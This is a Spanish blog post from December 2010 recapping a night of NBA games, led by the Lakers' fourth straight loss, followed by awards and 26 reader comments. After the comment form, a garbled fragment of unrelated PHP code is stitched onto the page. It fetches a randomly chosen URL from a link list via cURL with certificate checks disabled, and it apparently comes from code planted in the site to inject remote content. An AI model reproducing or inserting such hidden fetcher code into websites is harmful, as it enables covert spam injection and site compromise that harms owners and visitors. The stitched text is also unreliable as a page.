La Crónica (01/12/2010)

02 de December de 2010 por TheDeerHunter

Desde que Pau aterrizó en L.A hace ya casi tres años jamás había perdido 4 partidos seguidos. Anoche jugó su peor partido de la actual campaña, ganándose a pulso ese hito negativo contra un equipo y un juego interior, el de Houston, que no es nada del otro jueves. De poco sirvió el partidazo de Odom y los puntos de Kobe, así como el buen hacer del banco. Estos Lakers no defienden nada y son capaces de conseguir que un jugador limitado como Battier pueda anotar como le dé la gana (99-109).

Los líderes, Spurs, sin embargo, no aprovecharon la coyuntura y tropezaron en el Staples ante los Clippers (85-90). Griffin se doctoró nada menos que ante Duncan llegando a abusar de el mejor ala pívot de la historia. Desde que le dimos el MVP a Tony Parker no levanta cabeza.

Los perseguidores más inmediatos de los Spurs ganaron todos. Los Mavs ganaron sobradísimos a los Wolves permitiéndose el lujo de repartir minutos y descansar (86-100); los Jazz funcionaron como un reloj ante unos Pacers desbordados (88-110); los Hornets desactivaron a los Bobcats (73-89) y los Thunder, sin Durant, ganaron de milagro en New Jersey tras tres prórrogas (123-120). Denver también ganó a Milwaukee (94-105).

En el Este parece que han encontrado cierta estabilidad. Los Celtics ganaron a Portland gracias al extraordinario partido de Pierce (95-99). Orlando dio la bienvenida a Boozer a la temporada pegándoles un meneo de tres pares (107-78). Atlanta ganó con dificultades a Memphis (109-112) sin Joe Johnson lesionado y los Heat destrozaron a Detroit (72-97) desde la defensa (y las facilidades que dan los Pistons mirando aro).

Finalmente destacar el gran partido de los Raptors ante Washington, con muy buena dirección de Calderón (108-127).

PREMIOS

MVP: En Oklahoma no deben preocuparse si Durant falla un día. En el equipo hay jugadores capaces de asumir el liderazgo y llevar al equipo a la victoria. Anoche, Russell Westbrook se quedó a una asistencias de triple doble, contabilizando 38 puntos, 15 rebotes9 asistencias y 3 robos. Pero lo mejor es que su compañero Jeff Green se fue a los 37 puntos, 5 rebotes y 4 asistencias. La trampa es que el partido tuvo 3 prórrogas.

Rookie: No sé si empezar a obviar el nombre de Blake Griffin por aquello de dotar de algo más de variedad al premio. El de los Clippers volvió a superar la treintena de puntos sumando además, 13 rebotes, 4 asistencias y 2 robos, ante el mismísimo Tim Duncan. A un mundo de distancia, Larry Sanders llegó a los 14 puntos y 10 rebotes y John Wall a los 19 puntos y 8 asistencias. Destacamos el primer partio de Ed Davis que anotó 11 puntos y capturó 6  rebotes. Buenas noticias en Toronto.

Sorpresa: Titular por la lesión de un compañero, partido de 3 prórrogas… O aprovechas esta oportunidad o mejor que te vayas para casa. Jordan Farmar la aprovechó divinamente compartiendo protagonismo con Lopez. 28 puntos y 9 asistencias para el ex-Laker.

Decepción: Las cosas no le están saliendo nada bien a Jarrett Jack desde que llegó a New Orleans. Hoy sólo ha jugado 7 minutos, errando los 4 tiros intentados. Gilbert Arenas también ha resultado más una carga que una ayuda para su equipo con el 1 de 10 que se ha marcado.

Esfuerzo en vano: 4 derrotas seguidas llevan los Lakers y el mejor de anoche fue Lamar Odom, con 25 puntos (11 de 16) y 11 rebotes. ¿Deben empezar a preocuparse los amarillos?

Comenta

26 comentarios a esta entrada

  1. Rompe dice:
    #1

    Con Kobe al 70% y delegando responsabilidades en Gasol los Lakers funcionaban de maravilla. Ahora, con Kobe al “100%” no dan una, y se les están acabando las excusas, que estos Rockets no son nada del otro mundo.

      Citar

  2. nacho dice:
    #2

    Hombre, Kobe no está al 100%. Y las responsabilidades las delegan unos, y las asumen otros. En los últimos partidos la “cuestión Pau” esta más en el debe del catalán (y ojo que soy su fan nº1) Yo creo que al cansancio se le suma estar hasta los huevos de ver que no tiene recambio, pero bueno, es una opinión. Repito lo de ayer, los amarillos pensaban ganar 60 y pico partidos simplemente presentándose, a ver cuando se dan cuenta que también deben jugar.

      Citar

  3. Busky23 dice:
    #3

    Definitivamente me declaro fan total de Blake Griffin,creo que estamos delante de un jugador de época,un portento físico,ágil,rápido y con una fuerza y potencia descomunal (el mate de hoy en los morros de Duncan es sensacional). En solo mes y medio de carrera NBA…
    Destacable también la temporada que se esta cascando el Sr.Westbrook,liderando al equipo e incluso eclipsando muchas veces al mismísimo Durant.
    Los Lakers atravesando esas épocas de desidia defensiva que les condena a llegar siempre al final del partido con marcadores ajustados,lo que ocasiona que Gasol se diluya y Bryant empiece a jugarse los triples de 8 metros,3 y 4 contra uno…en fin,nada nuevo que no hayamos visto ya. Aun así,4 derrotas es para hacerselo mirar (Phil!,estas ahí…?)
    Saludos.

      Citar

  4. Busky23 dice:
    #4

    Por cierto,esta noche vuelve Lebronidas ( o Lebroma James como le llama Daimiel),a Ohio.
    Recibimiento a la Figo???, después de ver esta mañana en la ESPN a la gente tirar su camiseta a la basura,o arrastrarla por el suelo con un coche,no tengo ninguna duda.
    Que haríais vosotros,silbador e insultador por traidor,o valorar y aplaudir todo lo que ha hecho por la ciudad y la franquicia?

      Citar

  5. TheDeerHunter dice:
    #5

    Yo no encuentro ni el más mínimo motivo por el que la gente debería estar cabreada con LeBron en Cleveland, más allá del forofismo, claro.

      Citar

  6. TheDeerHunter dice:
    #6

    Es más, creo que lo poco que tienen (Mo o Jamison…) lo tienen porque estuvo LeBron en el equipo.
    Se deberían preocupar más porque los buenos jugadores quieran ir a jugar a su equipo y no por chorradas como esa.

      Citar

  7. Busky23 dice:
    #7

    Es lo de siempre,cada uno mira lo suyo,unos se sienten traicionados y otro con ganas de dar un paso adelante (que es muy posible que sea hacia atrás),en su carrera.
    Yo no seria de los que silbasen.

      Citar

  8. scriers dice:
    #8

    Desde luego, lo de Griffin tiene buenísima pinta. Ojalá le respeten las lesiones. Sospecho que en un par de partidos Baron Davis será titular y los Clippers pueden ganar a cualquiera (aunque también perder con cualquiera). Basta un buen impulso anímico como el de Griffin para que el equipo se lo crea y comiencen a ganar y por lo menos no sean una maría enorme.

    Ayer vi los Raptors darle un meneo enorme a los Wizards (en la segunda parte iban con el 70% de tiros de 2). Creo que Calderón ha vuelto a coger su forma, que es hacer entre 10-13 puntos y 6 y 10 asistencias. Luego pues creo que pocas veces más podrán anotar así, todo el mundo anotaba, hasta jugadores de poca participación en la rotación. También vi a Memphis dejarse remontar en la primera parte una curiosa ventaja, qué equipo más raro, tiene el talento justo para aunarse y fastidiarle a cualquiera y luego juegan que parece la guerra, cada uno por su lado.

    Y lo de los Lakers, me sorprende, pues no he visto los 3 últimos partidos. ¿Kobesistema o sencillamente bajón? Lo de Gasol es espectacular, por lo malo, que bajón tan brutal desde su partido 10/10. Se ha cargado todas sus opciones de jugador del mes, y por supuesto, de jugador del oeste. Es que en la NBA conseguir regularidad en anotaciones altas es muy muy difícil.

      Citar

  9. Busky23 dice:
    #9

    Pau sufre molestias en los inquios,confirmadas por él después del partido en Houston. Él y Odom están acumulando muchísimos minutos,con Ratliff y Bynum fuera de combate,Gasol deberá seguir acumulando minutos jugando al 50% y lo que es peor,con el agravante de que las molestias vayan a más,si recordáis,el curso pasado ya se perdió 11 partidos por el mismo motivo.
    Esperemos que todo vaya bien por el bien de los amarillos,la vida sin Gasol es mucho mas complicada

      Citar

  10. Busky23 dice:
    #10

    Donde dije inquios digo isquios jajaja,es lo que tiene trabajar y escribir con el móvil a la vez,mil disculpas 😉

      Citar

  11. Txusma dice:
    #11

    No tengo claro que la vuelta de Davis vaya a ser muy positiva. En cambio la de Kaman sí que puedo propusarles.

      Citar

  12. portu dice:
    #12

    Lo de Griffin es brutal. A mi me recuerda al Barkley de sus primeros años pero todavía más explosivo, y claro, al tener más altura es casi imparable. En cuanto a potencia de salto creo q tb estaría al nivel del McDyess de antes de su 1era lesión de rodilla, pero McDyess era muy tosco en el resto de su juego, justo lo q fue mejorando al verse limitado físicamente por las lesiones.

      Citar

  13. Denise dice:
    #13

    Declaraciones de Kobe tras el partido:
    “”Estamos jugando de una forma inaceptable y es como si nos estuviésemos hundiendo en arenas movedizas. No nos está funcionando la profundidad del banquillo””

    O sea, que sus mandarinas en los últimos partidos no tienen nada que ver. Más circulación de balón y menos Kobesistema y las victorias llegarán.

    Blake Griffin tremendo, ojala los Clippers puedan deshacerse en febrero o este verano de Kaman y Baron, y monten un buen equipo a su alrededor, de lo que no hay duda es que es un jugador franquicia, no como los últimos pivots nº1 de los Drafts, Bargnani, Bogut, y Oden

      Citar

  14. Vader dice:
    #14

    Lo de Griffin ya di mi opinión en otro post… tiene pinta de futuro MVP porque All-Star ya podria ser este año tranquilamente.

    Sobre el recibimiento a Lebron. Yo si que le silbaria, no le reprocho que decidiera cambiar de equipo, tiene todo el derecho. Pero la forma en como lo anuncio si que no me parecio nada bien y creo que fue una falta de respeto para la afición y la organización de Cleveland. Cuando tomo la “decisión” tendria que haberla dicho primero a la gerencia de Cleveland y luego hacerla pública pero sin montar ese lamentable show. Entiendo perfectamente lo que sienten la gente de Ohio…

    Y sobre los Lakers yo no me preocuparia demasiado, el problema es la saturación de minutos a estas alturas de Odom y Gasol y tambien que el equipo se tiene que ajustar de nuevo a Kobe jugando más minutos. Pero despues de 3 finales seguidas y dos títulos no vamos a discutir a los Lakers, su sistema y el hecho que el jugador franquicia y máximo anotador siga siendo Bryant.

    Saludos

      Citar

  15. Denise dice:
    #15

    Sobre Lebron, él no ha hecho nada malo, simplemente ha terminado su contrato, es libre y se ha marchado al equipo que le ha salido de las pelotas. Quien le silbe, es un radical y un forofo.
    Los que si me dan coraje son los llorones que firman un mega contrato, y cuando llevan un par de años sin comerse un rosco empiezan a pedir traspasos, a negarse a jugar o a lloriquear a la prensa. esos tipos deberían estar sancionados por la NBA, cosa imposible, puesto que los que lo hacen suelen ser las estrellas que dan de comer a los dirigentes de la NBA.
    No discuto el sitema de Phil, solo que ser el mejor no debería ser sinónimo de tener licencia para tirar, además ya no es una cuestión de cuantos tiros tira, sino de cómo los tira, forzadísimos, con 3 tios encima, mientras sus compañeros esperan solos y aburridos en las esquinas. Y lo de criticar el banquillo, manda huevos….,

      Citar

  16. Rompe dice:
    #16

    Por cierto, va siendo hora de darle un MVP a Blake, que no lleva ninguno!

      Citar

  17. TX dice:
    #17

    Denis, hay un par de comentarios tuyos que no me parecen muy acetados:
    “de lo que no hay duda es que es un jugador franquicia, no como los últimos pivots nº1 de los Drafts, Bargnani, Bogut, y Oden”
    No me parece que Bogut y Oden sean malos. Ahora mismo Bogut está promediando 11.6 PPG y 10.9 RPG, o sea 11 puntos y medio y casi 11 rebotes de media. Promediar un doble doble y guiar en gran medida a un equipo a playoffs no me parecen malos datos (recordemos cuántos partidos ha ganado el equipo de Griffin) y es demasiado oportunista decir ahora que Oden es malo. Ni que hubiera tenido muchas ocasiones de jugar…
    Bargnani no tiene remedio, ahi te doy la razón.
    “Los que si me dan coraje son los llorones que firman un mega contrato, y cuando llevan un par de años sin comerse un rosco empiezan a pedir traspasos, a negarse a jugar o a lloriquear a la prensa. esos tipos deberían estar sancionados por la NBA, cosa imposible, puesto que los que lo hacen suelen ser las estrellas que dan de comer a los dirigentes de la NBA.”
    Acaso no lo hacen? Vease Rodolfo Fernández….

      Citar

  18. TheDeerHunter dice:
    #18

    A mí me parece que exageráis con la trascendencia de los contratos. Todo el mundo tiene derecho a quejarse si la situación no es la que se contemplaba al firmar el contrato.
    Algunos, incluso, se rescinden y aquí paz y después gloria. Es tan normal como la vida misma.

      Citar

  19. TX dice:
    #19

    SI a mi no me parece mal en absoluto, pero Denis dice que les sancionen y ya lo hacen

      Citar

  20. Denise dice:
    #20

    No he dicho que sean malos, he dicho que no me parecen jugadores franquicias.

      Citar

  21. Hynreck dice:
    #21

    Hombre, el draft de Bargnani tampo era de mucha calidad, excepción hecha de Roy, LaMarcus, Rondo y Gay, su elección está claro que no fue afortunada, pero no es tan grave.
    Este año parece que tampoco ha venido muy prolífico de momento, salvo Wall no se vislumbra nada detras destacable (A Blake no le considero del draft de 2010)

      Citar

  22. TheDeerHunter dice:
    #22

    No podemos ignorar a Landry Fields, rookie del mes en el este. 11 puntitos 7 rebotes que no están nada mal.

      Citar

  23. Hynreck dice:
    #23

    Cierto, Fields está siendo de momento el robo del draft (Leí en algún sitio una definición que se adapta mejor: “Regalo del draft”). Bledsoe con minutos no lo ha hecho mal, Cousins…pero no veo a Fields con potencial All-Star la verdad.

      Citar

  24. Txusma dice:
    #24

    Lo que es todavía más denunciable es esa estrella que al no ver satisfechos sus deseos de abandonar la franquicia baja su rendimiento de forma premeditado para forzar el traspaso. Ej: Vince Carter y la diferencia de rendimiento entre la primera parte de la temporada en los Raptors y la siguiente en los Nets. A un jugador así no lo querría en mi equipo.

      Citar

  25. GreenPride dice:
    #25

    Los Lakers estan en un profundo bache. No lo veo muy preocupante por las alturas de temporada en las que estamos pero es evidente que necesitan recambios interiores cuanto antes. Pau no puede con las botas y lo notan mucho mucho y Kobe sale en el ultimo cuarto a jugárselas todas y no funciona como es de suponer. Además si dejas que Battier se ría de tu defensa en el momento decisivo pues mal vamos. De todas formas creo que reaccionaran y volverán a estar arriba.

      Citar

  26. aro_pasado_no_newtoniano dice:
    #26

    Le han llamado calvo, valvo????

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>